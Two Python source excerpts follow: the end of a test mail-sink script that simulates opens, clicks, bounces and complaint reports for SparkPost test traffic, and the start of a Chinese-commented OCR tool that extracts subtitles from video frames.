isB = str(int(isSparky)).encode('utf-8')
_ = shareRes.setKey(baseurl, isB, ex=3600) # mark this as known, but with an expiry time
return isSparky, err
# Improved "GET" - doesn't follow the redirect, and opens as stream (so doesn't actually fetch a lot of stuff)
def touchEndPoint(s, url, openClickTimeout, userAgent):
_ = s.get(url, allow_redirects=False, timeout=openClickTimeout, stream=True, headers={'User-Agent': userAgent})
# Parse html email body, looking for open-pixel and links. Follow these to do open & click tracking
class MyHTMLOpenParser(HTMLParser):
def __init__(self, s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist):
HTMLParser.__init__(self)
self.requestSession = s # Use persistent 'requests' session for speed
self.shareRes = shareRes # shared results handle
self.err = None # use this to return results strings
self.openClickTimeout = openClickTimeout
self.userAgent = userAgent
self.trackingDomainsAllowlist = trackingDomainsAllowlist
def handle_starttag(self, tag, attrs):
if tag == 'img':
for attrName, attrValue in attrs:
if attrName == 'src':
# attrValue = url
isSP, self.err = isSparkPostTrackingEndpoint(self.requestSession, attrValue, self.shareRes, self.openClickTimeout, self.trackingDomainsAllowlist)
if isSP:
touchEndPoint(self.requestSession, attrValue, self.openClickTimeout, self.userAgent)
else:
self.shareRes.incrementKey('open_url_not_sparkpost')
def err(self):
return self.err
class MyHTMLClickParser(HTMLParser):
def __init__(self, s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist):
HTMLParser.__init__(self)
self.requestSession = s # Use persistent 'requests' session for speed
self.shareRes = shareRes # shared results handle
self.err = None # use this to return results strings
self.openClickTimeout = openClickTimeout
self.userAgent = userAgent
self.trackingDomainsAllowlist = trackingDomainsAllowlist
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attrName, attrValue in attrs:
if attrName == 'href':
# attrValue = url
isSP, self.err = isSparkPostTrackingEndpoint(self.requestSession, attrValue, self.shareRes, self.openClickTimeout, self.trackingDomainsAllowlist)
if isSP:
touchEndPoint(self.requestSession, attrValue, self.openClickTimeout, self.userAgent)
else:
self.shareRes.incrementKey('click_url_not_sparkpost')
def err(self):
return self.err
# open / open again / click / click again logic, as per conditional probabilities
# takes a persistent requests session object
def openClickMail(mail, probs, shareRes, s, openClickTimeout, userAgent, trackingDomainsAllowlist):
ll = ''
bd = mail.get_body(('html',))
if bd: # if no body to parse, ignore
body = bd.get_content() # this handles quoted-printable type for us
htmlOpenParser = MyHTMLOpenParser(s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist)
shareRes.incrementKey('open')
htmlOpenParser.feed(body)
e = htmlOpenParser.err
ll += '_Open' if e == None else e
if random.random() <= probs['OpenAgain_Given_Open']:
htmlOpenParser.feed(body)
ll += '_OpenAgain' if e == None else e
shareRes.incrementKey('open_again')
if random.random() <= probs['Click_Given_Open']:
htmlClickParser = MyHTMLClickParser(s, shareRes, openClickTimeout, userAgent, trackingDomainsAllowlist)
htmlClickParser.feed(body)
ll += '_Click' if e == None else e
shareRes.incrementKey('click')
if random.random() <= probs['ClickAgain_Given_Click']:
htmlClickParser.feed(body)
ll += '_ClickAgain' if e == None else e
shareRes.incrementKey('click_again')
return ll
def addressSplit(e):
"""
:param e: email.header
:return: displayName, localpart, domainpart str
"""
s = str(e)
displayName = ''
openB = s.find('<')
closeB = s.find('>')
if openB >= 0 and closeB >= 0:
displayName = s[:openB].strip(' ')
s = s[openB+1:closeB].strip(' ') # this is the address part
localpart, domainpart = s.split('@')
return displayName, localpart, domainpart
def addressPart(e):
"""
:param e: email.header
:return: str Just the local@domain part
"""
_, localPart, domainPart = addressSplit(e)
return localPart + '@' + domainPart
# -----------------------------------------------------------------------------
# Process a single mail file according to the probabilistic model & special subdomains
# If special subdomains used, these override the model, providing SPF check has passed.
# Actions taken are recorded in a string which is passed back for logging, via clumsy
# For efficiency, takes a pre-allocated http requests session for opens/clicks, and can be multi-threaded
# Now opens, parses and deletes the file here inside the sub-process
# -----------------------------------------------------------------------------
def processMail(fname, probs, shareRes, resQ, session, openClickTimeout, userAgents, signalsTrafficPrefix, signalsOpenDays, doneMsgFileDest, trackingDomainsAllowlist):
try:
logline=''
with open(fname) as fIn:
mail = email.message_from_file(fIn, policy=policy.default)
xhdr = mail['X-Bouncy-Sink']
if doneMsgFileDest and xhdr and 'store-done' in xhdr.lower():
if not os.path.isdir(doneMsgFileDest):
os.mkdir(doneMsgFileDest)
donePathFile = os.path.join(doneMsgFileDest, os.path.basename(fname))
os.rename(fname, donePathFile)
else:
os.remove(fname) # OK to remove while open, contents destroyed once file handle closed
# Log addresses. Some rogue / spammy messages seen are missing From and To addresses
logline += fname + ',' + xstr(mail['to']) + ',' + xstr(mail['from'])
shareRes.incrementKey('total_messages')
ts_min_resolution = int(time.time()//60)*60
shareRes.incrementTimeSeries(str(ts_min_resolution))
# Test that message was checked by PMTA and has valid DKIM signature
auth = mail['Authentication-Results']
if auth != None and 'dkim=pass' in auth:
# Check for special "To" subdomains that signal what action to take (for safety, these also require inbound spf to have passed)
subd = mail['to'].split('@')[1].split('.')[0]
# SparkPost Signals engagement-recency adjustments
doIt = True
_, localpart, _ = addressSplit(mail['To'])
alphaPrefix = localpart.split('+')[0]
finalChar = localpart[-1] # final char should be a digit 0-9
if alphaPrefix == signalsTrafficPrefix and str.isdigit(finalChar):
currentDay = datetime.now().day # 1 - 31
finalDigit = int(finalChar)
doIt = currentDay in signalsOpenDays[finalDigit]
logline += ',currentDay={},finalDigit={}'.format(currentDay, finalDigit)
if subd == 'oob':
if 'spf=pass' in auth:
logline += ',' + oobGen(mail, shareRes)
else:
logline += ',!Special ' + subd + ' failed SPF check'
shareRes.incrementKey('fail_spf')
elif subd == 'fbl':
if 'spf=pass' in auth:
logline += ',' + fblGen(mail, shareRes)
else:
logline += ',!Special ' + subd + ' failed SPF check'
shareRes.incrementKey('fail_spf')
elif subd == 'openclick':
# doesn't need SPF pass
logline += ',' + openClickMail(mail, probs, shareRes, session, openClickTimeout, random.choice(userAgents), trackingDomainsAllowlist)
elif subd == 'accept':
logline += ',Accept'
shareRes.incrementKey('accept')
else:
# Apply probabilistic model to all other domains
if random.random() <= probs['OOB']:
# Mail that out-of-band bounces would not not make it to the inbox, so would not get opened, clicked or FBLd
logline += ',' + oobGen(mail, shareRes)
elif random.random() <= probs['FBL']:
logline += ',' + fblGen(mail, shareRes)
elif random.random() <= probs['Open'] and doIt:
logline += ',' + openClickMail(mail, probs, shareRes, session, openClickTimeout, random.choice(userAgents), trackingDomainsAllowlist)
else:
logline += ',Accept'
shareRes.incrementKey('accept')
else:
logline += ',!DKIM fail:' + xstr(auth)
shareRes.incrementKey('fail_dkim')
except Exception as err:
logline += ',!Exception: '+ str(err)
finally:
resQ.put(logline)
# -----------------------------------------------------------------------------
# Consume emails using threads/processes
# -----------------------------------------------------------------------------
# start to consume files - set up logging, record start time (if first run)
def startConsumeFiles(logger, cfg, fLen):
startTime = time.time() # measure run time
shareRes = Results() # class for sharing summary results
k = 'startedRunning'
res = shareRes.getKey(k) # read back results from previous run (if any)
if not res:
st = timeStr(startTime)
ok = shareRes.setKey(k, st)
logger.info('** First run - set {} = {}, ok = {}'.format(k, st, ok))
maxThreads = cfg.getint('Max_Threads', 16)
logger.info('** Process starting: consuming {} mail file(s) with {} threads'.format(fLen, maxThreads))
return shareRes, startTime, maxThreads
def stopConsumeFiles(logger, shareRes, startTime, countDone):
endTime = time.time()
runTime = endTime - startTime
runRate = (0 if runTime == 0 else countDone / runTime) # Ensure no divide by zero
logger.info('** Process finishing: run time(s)={:.3f},done {},done rate={:.3f}/s'.format(runTime, countDone, runRate))
history = 10 * 24 * 60 * 60 # keep this much time-series history (seconds)
shareRes.delTimeSeriesOlderThan(int(startTime) - history)
# return arrays of resources per thread
def initThreads(maxThreads):
th = [None] * maxThreads
thSession = [None] * maxThreads
for i in range(maxThreads):
thSession[i] = requests.session()
return th, thSession
# search for a free slot, with memory (so acts as round-robin)
def findFreeThreadSlot(th, thIdx):
t = (thIdx+1) % len(th)
while True:
if th[t] == None: # empty slot
return t
elif not th[t].is_alive(): # thread just finished
th[t] = None
return t
else: # keep searching
t = (t+1) % len(th)
if t == thIdx:
# already polled each slot once this call - so wait a while
time.sleep(0.1)
# Wait for threads to complete, marking them as None when done. Get logging results text back from queue, as this is
# thread-safe and process-safe
def gatherThreads(logger, th, gatherTimeout):
for i, tj in enumerate(th):
if tj:
tj.join(timeout=gatherTimeout) # for safety in case a thread hangs, set a timeout
if tj.is_alive():
logger.error('Thread {} timed out'.format(tj))
th[i] = None
# consume a list of files, delegating to worker threads / processes
def consumeFiles(logger, fnameList, cfg):
try:
shareRes, startTime, maxThreads = startConsumeFiles(logger, cfg, len(fnameList))
countDone = 0
signalsTrafficPrefix = cfg.get('Signals_Traffic_Prefix', '')
if signalsTrafficPrefix:
maxDayCount = 0
activeDigitDays = 0
signalsOpenDays= []
for i in range(0, 10):
daystr = cfg.get('Digit'+str(i)+'_Days', 0)
dayset = {int(j) for j in daystr.split(',') }
signalsOpenDays.append(dayset) # list of sets
maxDayCount = max(maxDayCount, len(dayset))
activeDigitDays += len(dayset)
activeDigitDensity = activeDigitDays/(10*maxDayCount)
else:
activeDigitDensity = 1.0
probs = getBounceProbabilities(cfg, activeDigitDensity, logger)
logger.info(probs)
openClickTimeout = cfg.getint('Open_Click_Timeout', 30)
gatherTimeout = cfg.getint('Gather_Timeout', 120)
userAgents = getUserAgents(cfg, logger)
doneMsgFileDest = cfg.get('Done_Msg_File_Dest')
trackingDomainsAllowlist = cfg.get('Tracking_Domains_Allowlist').replace(' ','').split(',')
if probs:
th, thSession = initThreads(maxThreads)
resultsQ = queue.Queue()
thIdx = 0 # round-robin slot
for fname in fnameList:
if os.path.isfile(fname):
# check and get a free process space
thIdx = findFreeThreadSlot(th, thIdx)
th[thIdx] = threading.Thread(target=processMail, args=(fname, probs, shareRes, resultsQ, thSession[thIdx], openClickTimeout, userAgents, signalsTrafficPrefix, signalsOpenDays, doneMsgFileDest, trackingDomainsAllowlist))
th[thIdx].start() # launch concurrent process
countDone += 1
emitLogs(resultsQ)
# check any remaining threads to gather back in
gatherThreads(logger, th, gatherTimeout)
emitLogs(resultsQ)
except Exception as e: # catch any exceptions, keep going
print(e)
logger.error(str(e))
stopConsumeFiles(logger, shareRes, startTime, countDone)
def emitLogs(resQ):
while not resQ.empty():
logger.info(resQ.get()) # write results to the logfile
# -----------------------------------------------------------------------------
# Set up probabilistic model for incoming mail from config
# -----------------------------------------------------------------------------
# Set conditional probability in mutable dict P for event a given event b. https://en.wikipedia.org/wiki/Conditional_probability
def checkSetCondProb(P, a, b, logger):
aGivenbName = a + '_Given_' + b
PaGivenb = P[a] / P[b]
if PaGivenb < 0 or PaGivenb > 1:
logger.error('Config file problem: {} and {} implies {} = {}, out of range'.format(a, b, aGivenbName, PaGivenb))
return None
else:
P[aGivenbName] = PaGivenb
return True
# For safety, clip values to lie in range 0.0 <= n <= 1.0
def probClip(n):
return max(0.0, min(1.0, n))
# Take the overall percentages and adjust them according to how much traffic we expect to receive. This app would not see
# the 'upstream handled' traffic percentage as PMTA blackholes / in-band-bounces this automatically via PMTA config, not in this application
# Express all values as probabilities 0 <= p <= 1.0
#
# For Signals, scale the open factor to allow for the filtering by active digit density
def getBounceProbabilities(cfg, activeDigitDensity, logger):
try:
thisAppTraffic = 1 - cfg.getfloat('Upstream_Handled') / 100
P = {
'OOB' : cfg.getfloat('OOB_percent') / 100 / thisAppTraffic,
'FBL' : cfg.getfloat('FBL_percent') / 100 / thisAppTraffic,
'Open' : cfg.getfloat('Open_percent') / 100 / thisAppTraffic,
'OpenAgain' : cfg.getfloat('Open_Again_percent') / 100 / thisAppTraffic,
'Click' : cfg.getfloat('Click_percent') / 100 / thisAppTraffic,
'ClickAgain': cfg.getfloat('Click_Again_percent') / 100 / thisAppTraffic
}
# Adjust open rates according to Signals periodic traffic profile, if present
weeklyCycleOpenList = cfg.get('Weekly_Cycle_Open_Rate', '1.0').split(',')
weeklyCycleOpenRate = [float(i) for i in weeklyCycleOpenList]
todayOpenFactor, _ = nWeeklyCycle(weeklyCycleOpenRate, datetime.utcnow())
todayOpenFactor = probClip(todayOpenFactor/activeDigitDensity)
P['Open'] = probClip(P['Open'] * todayOpenFactor)
P['OpenAgain'] = probClip(P['OpenAgain'] * todayOpenFactor)
P['Click'] = probClip(P['Click'] * todayOpenFactor)
P['ClickAgain'] = probClip(P['ClickAgain'] * todayOpenFactor)
# calculate conditional open & click probabilities, given a realistic state sequence would be
# Open?
# - Maybe OpenAgain?
# - Maybe Click?
# - Maybe ClickAgain?
if checkSetCondProb(P, 'OpenAgain', 'Open', logger) \
and checkSetCondProb(P, 'Click', 'Open', logger) \
and checkSetCondProb(P, 'ClickAgain', 'Click', logger):
return P
else:
return None
except (ValueError, configparser.Error) as e:
logger.error('Config file problem: '+str(e))
return None
# Get a list of realistic User Agent strings from the specified file in config
def getUserAgents(cfg, logger):
uaFileName = cfg.get('User_Agents_File')
if os.path.isfile(uaFileName):
with open(uaFileName, newline='') as uaFile:
ua = csv.DictReader(uaFile)
uaStringList = []
for u in ua:
uaStringList.append(u['Software'])
return uaStringList
else:
logger.error('Unable to open User_Agents_File '+uaFileName)
return None
# -----------------------------------------------------------------------------
# Main code
# -----------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Consume inbound mails, generating opens, clicks, OOBs and FBLs. Config file {} must be present in current directory.'.format(configFileName()))
parser.add_argument('directory', type=str, help='directory to ingest .msg files, process and delete them', )
parser.add_argument('-f', action='store_true', help='Keep looking for new files forever (like tail -f does)')
args = parser.parse_args()
cfg = readConfig(configFileName())
logger = createLogger(cfg.get('Logfile', baseProgName() + '.log'),
cfg.getint('Logfile_backupCount', 10))
if args.directory:
if args.f:
# Process the inbound directory forever
while True:
fnameList = glob.glob(os.path.join(args.directory, '*.msg'))
if fnameList:
consumeFiles(logger, fnameList, cfg)
time.sleep(5)
cfg = readConfig(configFileName()) # get config again, in case it's changed
else:
# Just process once
fnameList = glob.glob(os.path.join(args.directory, '*.msg'))
if fnameList:
consumeFiles(logger, fnameList, cfg)
|
main.py
|
# -*- coding: utf-8 -*-
"""
@Author : Fang Yao
@Time : 2021/3/24 9:28 上午
@FileName: main.py
@desc: 主程序入口文件
"""
import re
import os
import random
from collections import Counter
import unicodedata
from threading import Thread
import cv2
from Levenshtein import ratio
from PIL import Image
from numpy import average, dot, linalg
import numpy as np
import sys
sys.path.insert(0, os.path.dirname(__file__))
import config
from config import interface_config
from tools.reformat_en import reformat
from tools.infer import utility
from tools.infer.predict_det import TextDetector
from tools.infer.predict_system import TextSystem
import platform
# 加载文本检测+识别模型
class OcrRecogniser:
def __init__(self):
# 获取参数对象
self.args = utility.parse_args()
self.recogniser = self.init_model()
def predict(self, image):
detection_box, recognise_result = self.recogniser(image)
return detection_box, recognise_result
def init_model(self):
self.args.use_gpu = config.USE_GPU
if config.USE_GPU:
# 设置文本检测模型路径
self.args.det_model_dir = config.DET_MODEL_PATH
# 设置文本识别模型路径
self.args.rec_model_dir = config.REC_MODEL_PATH
else:
# 加载快速模型
self.args.det_model_dir = config.DET_MODEL_FAST_PATH
# 加载快速模型
self.args.rec_model_dir = config.REC_MODEL_FAST_PATH
# 设置字典路径
self.args.rec_char_dict_path = config.DICT_PATH
# 设置识别文本的类型
self.args.rec_char_type = config.REC_CHAR_TYPE
return TextSystem(self.args)
class SubtitleDetect:
def __init__(self):
# 获取参数对象
args = utility.parse_args()
args.det_algorithm = 'DB'
args.det_model_dir = config.DET_MODEL_FAST_PATH
self.text_detector = TextDetector(args)
def detect_subtitle(self, img):
dt_boxes, elapse = self.text_detector(img)
return dt_boxes, elapse
class SubtitleExtractor:
"""
视频字幕提取类
"""
def __init__(self, vd_path, sub_area=None):
# 字幕区域位置
self.sub_area = sub_area
self.sub_detector = SubtitleDetect()
# 临时存储文件夹
self.temp_output_dir = os.path.join(os.path.dirname(config.BASE_DIR), 'output')
# 视频路径
self.video_path = vd_path
self.video_cap = cv2.VideoCapture(vd_path)
# 视频帧总数
self.frame_count = self.video_cap.get(cv2.CAP_PROP_FRAME_COUNT)
# 视频帧率
self.fps = self.video_cap.get(cv2.CAP_PROP_FPS)
# 视频尺寸
self.frame_height = int(self.video_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_width = int(self.video_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
# 字幕出现区域
self.subtitle_area = config.SUBTITLE_AREA
print(f"{interface_config['Main']['FrameCount']}:{self.frame_count},{interface_config['Main']['FrameRate']}:{self.fps}")
# 提取的视频帧储存目录
self.frame_output_dir = os.path.join(self.temp_output_dir, 'frames')
# 提取的字幕文件存储目录
self.subtitle_output_dir = os.path.join(self.temp_output_dir, 'subtitle')
# 定义vsf的字幕输出路径
self.vsf_subtitle = os.path.join(self.subtitle_output_dir, 'raw_vsf.srt')
# 不存在则创建文件夹
if not os.path.exists(self.frame_output_dir):
os.makedirs(self.frame_output_dir)
if not os.path.exists(self.subtitle_output_dir):
os.makedirs(self.subtitle_output_dir)
# 提取的原始字幕文本存储路径
self.raw_subtitle_path = os.path.join(self.subtitle_output_dir, 'raw.txt')
# 自定义ocr对象
self.ocr = OcrRecogniser()
# 处理进度
self.progress = 0
def run(self):
"""
运行整个提取视频的步骤
"""
print(interface_config['Main']['StartProcessFrame'])
if self.sub_area is not None:
# 如果开启精准模式
if config.ACCURATE_MODE_ON:
# 开启精准模式并且有GPU加速
if config.USE_GPU:
self.extract_frame_by_det()
else:
self.extract_frame_by_fps()
# 如果没有开启精准模式
else:
# 没有开启精准模式且操作系统为Windows
if platform.system() == 'Windows':
self.extract_frame_by_vsf()
else:
self.extract_frame_by_fps()
else:
self.extract_frame_by_fps()
print(interface_config['Main']['FinishProcessFrame'])
print(interface_config['Main']['StartFindSub'])
# 重置进度条
self.progress = 0
self.extract_subtitles()
print(interface_config['Main']['FinishFindSub'])
if self.sub_area is None:
print(interface_config['Main']['StartDetectWaterMark'])
# 询问用户视频是否有水印区域
user_input = input(interface_config['Main']['checkWaterMark']).strip()
if user_input == 'y':
self.filter_watermark()
print(interface_config['Main']['FinishDetectWaterMark'])
else:
print('-----------------------------')
if self.sub_area is None:
print(interface_config['Main']['StartDeleteNonSub'])
self.filter_scene_text()
print(interface_config['Main']['FinishDeleteNonSub'])
print(interface_config['Main']['StartGenerateSub'])
# 判断是否开启精准模式
if config.ACCURATE_MODE_ON:
# 如果开启精准模式则使用原生字幕生成
self.generate_subtitle_file()
else:
# 如果没有开启精准模式,则Windows平台默认使用vsf提取
if platform.system() == 'Windows':
self.generate_subtitle_file_vsf()
else:
self.generate_subtitle_file()
# 如果识别的字幕语言包含英文,则将英文分词
if config.REC_CHAR_TYPE in ('ch', 'EN', 'en', 'ch_tra'):
reformat(os.path.join(os.path.splitext(self.video_path)[0] + '.srt'))
print(interface_config['Main']['FinishGenerateSub'])
self.progress = 100
def extract_frame(self):
"""
根据视频的分辨率,将高分辨的视频帧缩放到1280*720p
根据字幕区域位置,将该图像区域截取出来
"""
# 删除缓存
self.__delete_frame_cache()
# 当前视频帧的帧号
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# 如果读取视频帧失败(视频读到最后一帧)
if not ret:
break
# 读取视频帧成功
else:
frame_no += 1
frame = self._frame_preprocess(frame)
# 帧名往前补零,后续用于排序与时间戳转换,补足8位
# 一部10h电影,fps120帧最多也才1*60*60*120=432000 6位,所以8位足够
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# 保存视频帧
cv2.imwrite(filename, frame)
# 将当前帧与接下来的帧进行比较,计算余弦相似度
compare_times = 0
while self.video_cap.isOpened():
ret, frame_next = self.video_cap.read()
if ret:
frame_no += 1
# 更新进度条
self.progress = (frame_no / self.frame_count) * 100
frame_next = self._frame_preprocess(frame_next)
cosine_distance = self._compute_image_similarity(Image.fromarray(frame),
Image.fromarray(frame_next))
compare_times += 1
if compare_times == config.FRAME_COMPARE_TIMES:
break
if cosine_distance > config.COSINE_SIMILARITY_THRESHOLD:
# 如果下一帧与当前帧的相似度大于设定阈值,则略过该帧
continue
# 如果相似度小于设定阈值,停止该while循环
else:
break
else:
break
self.video_cap.release()
def extract_frame_by_fps(self):
"""
根据帧率,定时提取视频帧,容易丢字幕,但速度快
"""
# 删除缓存
self.__delete_frame_cache()
# 当前视频帧的帧号
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# 如果读取视频帧失败(视频读到最后一帧)
if not ret:
break
# 读取视频帧成功
else:
frame_no += 1
frame = self._frame_preprocess(frame)
# 帧名往前补零,后续用于排序与时间戳转换,补足8位
# 一部10h电影,fps120帧最多也才1*60*60*120=432000 6位,所以8位足够
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# 保存视频帧
cv2.imwrite(filename, frame)
# 跳过剩下的帧
for i in range(int(self.fps // config.EXTRACT_FREQUENCY) - 1):
ret, _ = self.video_cap.read()
if ret:
frame_no += 1
# 更新进度条
self.progress = (frame_no / self.frame_count) * 100
self.video_cap.release()
def extract_frame_by_det(self):
"""
通过检测字幕区域位置提取字幕帧
"""
# 删除缓存
self.__delete_frame_cache()
# 当前视频帧的帧号
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# 如果读取视频帧失败(视频读到最后一帧)
if not ret:
break
# 读取视频帧成功
else:
frame_no += 1
if self.sub_area is not None:
ymin, ymax, xmin, xmax = self.sub_area
dt_boxes, elapse = self.sub_detector.detect_subtitle(frame[ymin:ymax, xmin:xmax])
if len(dt_boxes) > 0:
# 帧名往前补零,后续用于排序与时间戳转换,补足8位
# 一部10h电影,fps120帧最多也才1*60*60*120=432000 6位,所以8位足够
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# 查询frame目录下最后两张图片
frame_list = sorted([i for i in os.listdir(self.frame_output_dir) if i.endswith('.jpg')])
# 如果frame列表大于等于2则取出最后两张图片
if len(frame_list) < 2:
# 保存视频帧
cv2.imwrite(filename, frame)
else:
frame_last = cv2.imread(os.path.join(self.frame_output_dir, frame_list[-1]))
frame_last_2nd = cv2.imread(os.path.join(self.frame_output_dir, frame_list[-2]))
if self._compare_ocr_result(frame_last, frame_last_2nd):
if self._compare_ocr_result(frame_last, frame):
# 如果当最后两帧内容一样,且最后一帧与当前帧一样
# 删除最后一张,将当前帧设置为最后一帧
os.remove(os.path.join(self.frame_output_dir, frame_list[-1]))
cv2.imwrite(filename, frame)
self.progress = (frame_no / self.frame_count) * 100
print(f"{interface_config['Main']['SubFrameNo']}:{frame_no}, {interface_config['Main']['Elapse']}: {elapse}")
self.video_cap.release()
def extract_frame_by_vsf(self):
"""
通过调用videoSubFinder获取字幕帧
"""
def count_process():
duration_ms = (self.frame_count / self.fps) * 1000
while True:
rgb_images_path = os.path.join(self.temp_output_dir, 'RGBImages')
if os.path.exists(rgb_images_path):
rgb_images = sorted(os.listdir(rgb_images_path))
if len(os.listdir(self.frame_output_dir)) > 0:
break
if len(rgb_images) > 0:
rgb_images_last = rgb_images[-1]
h, m, s, ms = rgb_images_last.split('__')[0].split('_')
total_ms = int(ms) + int(s) * 1000 + int(m) * 60 * 1000 + int(h) * 60 * 60 * 1000
if total_ms / duration_ms > 1:
self.progress = 100
else:
self.progress = (total_ms / duration_ms) * 100
else:
continue
# 删除缓存
self.__delete_frame_cache()
# 定义videoSubFinder所在路径
path_vsf = os.path.join(config.BASE_DIR, '', 'subfinder', 'VideoSubFinderWXW.exe')
# :图像上半部分所占百分比,取值【0-1】
top_end = 1 - self.sub_area[0] / self.frame_height
# bottom_end:图像下半部分所占百分比,取值【0-1】
bottom_end = 1 - self.sub_area[1] / self.frame_height
# left_end:图像左半部分所占百分比,取值【0-1】
left_end = self.sub_area[2] / self.frame_width
# re:图像右半部分所占百分比,取值【0-1】
right_end = self.sub_area[3] / self.frame_width
# 定义执行命令
cmd = path_vsf + " -c -r" + " -i \"" + self.video_path + "\" -o " + self.temp_output_dir + f' -ces {self.vsf_subtitle}' + f' -te {top_end}' + f' -be {bottom_end}' + f' -le {left_end}' + f' -re {right_end}'
# 计算进度
Thread(target=count_process, daemon=True).start()
import subprocess
subprocess.run(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# 提取字幕帧
cap = cv2.VideoCapture(self.video_path)
for i, frame_name in enumerate(os.listdir(os.path.join(self.temp_output_dir, 'RGBImages'))):
timestamp = frame_name.split('__')[0]
h, m, s, ms = timestamp.split('_')
total_ms = int(ms) + int(s) * 1000 + int(m) * 60 * 1000 + int(h) * 60 * 60 * 1000
cap.set(cv2.CAP_PROP_POS_MSEC, total_ms)
ret, frame = cap.read()
if ret:
img_name = os.path.join(self.frame_output_dir, f'{str(i + 1).zfill(8)}.jpg')
cv2.imwrite(img_name, frame)
# 释放占用资源
cap.release()
def extract_subtitle_frame(self):
"""
提取包含字幕的视频帧
"""
# 删除缓存
self.__delete_frame_cache()
# 获取字幕帧列表
subtitle_frame_list = self._analyse_subtitle_frame()
if subtitle_frame_list is None:
print(interface_config['Main']['ChooseSubArea'])
return
cap = cv2.VideoCapture(self.video_path)
idx = 0
index = 0
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
if idx in subtitle_frame_list and idx != 0:
filename = os.path.join(self.frame_output_dir, str(idx).zfill(8) + '.jpg')
frame = self._frame_preprocess(frame)
cv2.imwrite(filename, frame)
subtitle_frame_list.remove(idx)
index += 1
idx = idx + 1
cap.release()
def extract_subtitles(self):
"""
提取视频帧中的字幕信息,生成一个txt文件
"""
# 初始化文本识别对象
text_recogniser = OcrRecogniser()
# 视频帧列表
frame_list = [i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]
# 删除缓存
if os.path.exists(self.raw_subtitle_path):
os.remove(self.raw_subtitle_path)
# 新建文件
f = open(self.raw_subtitle_path, mode='w+', encoding='utf-8')
for i, frame in enumerate(frame_list):
# 读取视频帧
img = cv2.imread(os.path.join(self.frame_output_dir, frame))
# 获取检测结果
dt_box, rec_res = text_recogniser.predict(img)
# 获取文本坐标
coordinates = self.__get_coordinates(dt_box)
# 将结果写入txt文本中
text_res = [(res[0], res[1]) for res in rec_res]
# 进度条
self.progress = i / len(frame_list) * 100
for content, coordinate in zip(text_res, coordinates):
if self.sub_area is not None:
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
xmin = coordinate[0]
xmax = coordinate[1]
ymin = coordinate[2]
ymax = coordinate[3]
if s_xmin <= xmin and xmax <= s_xmax and s_ymin <= ymin and ymax <= s_ymax:
print(content[0])
if content[1] > config.DROP_SCORE:
f.write(f'{os.path.splitext(frame)[0]}\t'
f'{coordinate}\t'
f'{content[0]}\n')
else:
f.write(f'{os.path.splitext(frame)[0]}\t'
f'{coordinate}\t'
f'{content[0]}\n')
# 关闭文件
f.close()
def filter_watermark(self):
"""
去除原始字幕文本中的水印区域的文本
"""
# 获取潜在水印区域
watermark_areas = self._detect_watermark_area()
# 从frame目录随机读取一张图片,将所水印区域标记出来,用户看图判断是否是水印区域
frame_path = os.path.join(self.frame_output_dir,
random.choice(
[i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]))
sample_frame = cv2.imread(frame_path)
# 给潜在的水印区域编号
area_num = ['E', 'D', 'C', 'B', 'A']
for watermark_area in watermark_areas:
ymin = min(watermark_area[0][2], watermark_area[0][3])
ymax = max(watermark_area[0][3], watermark_area[0][2])
xmin = min(watermark_area[0][0], watermark_area[0][1])
xmax = max(watermark_area[0][1], watermark_area[0][0])
cover = sample_frame[ymin:ymax, xmin:xmax]
cover = cv2.blur(cover, (10, 10))
cv2.rectangle(cover, pt1=(0, cover.shape[0]), pt2=(cover.shape[1], 0), color=(0, 0, 255), thickness=3)
sample_frame[ymin:ymax, xmin:xmax] = cover
position = ((xmin + xmax) // 2, ymax)
cv2.putText(sample_frame, text=area_num.pop(), org=position, fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=1, color=(255, 0, 0), thickness=2, lineType=cv2.LINE_AA)
sample_frame_file_path = os.path.join(os.path.dirname(self.frame_output_dir), 'watermark_area.jpg')
cv2.imwrite(sample_frame_file_path, sample_frame)
print(f"{interface_config['Main']['WatchPicture']}: {sample_frame_file_path}")
area_num = ['E', 'D', 'C', 'B', 'A']
for watermark_area in watermark_areas:
user_input = input(f"{area_num.pop()}{str(watermark_area)} {interface_config['Main']['QuestionDelete']}").strip()
if user_input == 'y' or user_input == '\n':
with open(self.raw_subtitle_path, mode='r+', encoding='utf-8') as f:
content = f.readlines()
f.seek(0)
for i in content:
if i.find(str(watermark_area[0])) == -1:
f.write(i)
f.truncate()
print(interface_config['Main']['FinishDelete'])
print(interface_config['Main']['FinishWaterMarkFilter'])
# 删除缓存
if os.path.exists(sample_frame_file_path):
os.remove(sample_frame_file_path)
def filter_scene_text(self):
"""
将场景里提取的文字过滤,仅保留字幕区域
"""
# 获取潜在字幕区域
subtitle_area = self._detect_subtitle_area()[0][0]
# 从frame目录随机读取一张图片,将所水印区域标记出来,用户看图判断是否是水印区域
frame_path = os.path.join(self.frame_output_dir,
random.choice(
[i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]))
sample_frame = cv2.imread(frame_path)
# 为了防止有双行字幕,根据容忍度,将字幕区域y范围加高
ymin = abs(subtitle_area[0] - config.SUBTITLE_AREA_DEVIATION_PIXEL)
ymax = subtitle_area[1] + config.SUBTITLE_AREA_DEVIATION_PIXEL
# 画出字幕框的区域
